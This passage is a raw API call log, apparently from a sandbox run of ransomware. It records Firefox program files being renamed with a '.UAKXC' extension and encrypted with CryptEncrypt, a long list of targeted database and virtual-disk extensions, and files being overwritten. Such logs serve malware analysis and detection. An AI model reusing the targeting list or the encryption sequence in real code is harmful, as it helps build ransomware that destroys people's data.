Size=0x7fd7) returned 0xef04c8 [0139.883] lstrcpyW (in: lpString1=0xef04c8, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk") returned="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk" [0139.883] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk.UAKXC") returned="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk.UAKXC" [0139.883] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.chk"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk.UAKXC" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.chk.uakxc")) returned 1 [0139.884] GetProcessHeap () returned 0xea0000 [0139.884] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef04c8 | out: hHeap=0xea0000) returned 1 [0139.884] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee860 | out: hHeap=0xea0000) returned 1 [0139.884] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecf68 | out: hHeap=0xea0000) returned 1 [0139.884] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0139.884] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0139.884] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0139.885] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja" (normalized: "c:\\program files (x86)\\mozilla firefox\\omni.ja")) returned 0x20 [0139.920] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja" (normalized: "c:\\program files (x86)\\mozilla firefox\\omni.ja"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0139.920] GetLastError () returned 0x0 [0139.921] GetFileSizeEx (in: hFile=0x6c4, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=7806293) returned 1 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".4dd") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".4dl") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".accdb") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".accdc") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".accde") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".accdr") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".accdt") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".accft") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".adb") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".ade") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".adf") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".adp") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".arc") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".ora") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".alf") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".ask") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".btr") returned 0x0 [0139.921] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".bdf") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".cat") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".cdb") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".ckp") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".cma") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".cpd") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dacpac") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dad") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dadiagrams") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".daschema") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".db") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".db-shm") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".db-wal") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".db3") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dbc") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dbf") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dbs") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dbt") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dbv") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dbx") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dcb") returned 0x0 [0139.922] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dct") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dcx") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".ddl") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dlis") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dp1") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dqy") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dsk") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dsn") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dtsx") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".dxl") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".eco") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".ecx") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".edb") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".epim") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".exb") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".fcd") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".fdb") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".fic") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".fmp") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".fmp12") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".fmpsl") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".fol") returned 0x0 [0139.923] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".fp3") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".fp4") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".fp5") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".fp7") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".fpt") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".frm") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".gdb") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".grdb") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".gwi") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".hdb") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".his") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".ib") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".idb") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".ihx") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".itdb") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".itw") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".jet") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".jtx") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".kdb") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".kexi") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".kexic") returned 0x0 [0139.924] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".kexis") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".lgc") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".lwx") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".maf") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".maq") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".mar") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".mas") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".mav") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".mdb") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".mdf") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".mpd") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".mrg") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".mud") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".mwb") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".myd") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".ndf") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".nnt") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".nrmlib") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".ns2") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".ns3") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".ns4") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".nsf") returned 0x0 [0139.925] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".nv") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".nv2") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".nwdb") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".nyf") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".odb") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".oqy") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".orx") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".owc") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".p96") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".p97") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".pan") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".pdb") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".pdm") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".pnz") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".qry") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".qvd") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".rbf") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".rctd") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".rod") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".rodx") returned 0x0 [0139.926] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".rpd") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".rsd") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".sas7bdat") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".sbf") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".scx") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".sdb") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".sdc") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".sdf") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".sis") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".spq") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".sql") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".sqlite") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".sqlite3") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".sqlitedb") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".te") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".temx") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".tmd") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".tps") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".trc") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".trm") returned 0x0 [0139.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".udb") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".udl") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".usr") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".v12") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".vis") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".vpd") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".vvv") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".wdb") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".wmdb") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".wrk") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".xdb") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".xld") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".xmlff") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".abcddb") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".abs") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".abx") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".accdw") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".adn") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".db2") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".fm5") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".hjt") returned 0x0 [0139.928] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".icg") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".icr") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".kdb") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".lut") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".maw") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".mdn") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".mdt") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".vdi") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".vhd") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".vmdk") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".pvm") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".vmem") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".vmsn") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".vmsd") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".nvram") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".vmx") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".raw") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".qcow2") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".subvol") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".bin") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".vsv") returned 0x0 [0139.929] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".avhd") returned 0x0 [0139.930] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".vmrs") returned 0x0 [0139.930] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".vhdx") returned 0x0 [0139.930] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".avdx") returned 0x0 [0139.930] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".vmcx") returned 0x0 [0139.930] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja", lpSrch=".iso") returned 0x0 [0139.930] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.930] WriteFile (in: hFile=0x6c4, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0139.933] WriteFile (in: hFile=0x6c4, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0139.933] SetEndOfFile (hFile=0x6c4) returned 1 [0139.933] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.933] ReadFile (in: hFile=0x6c4, lpBuffer=0x4b20000, nNumberOfBytesToRead=0xbe94c, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc80*=0xbe94c, lpOverlapped=0x0) returned 1 [0140.003] SetFilePointerEx (in: 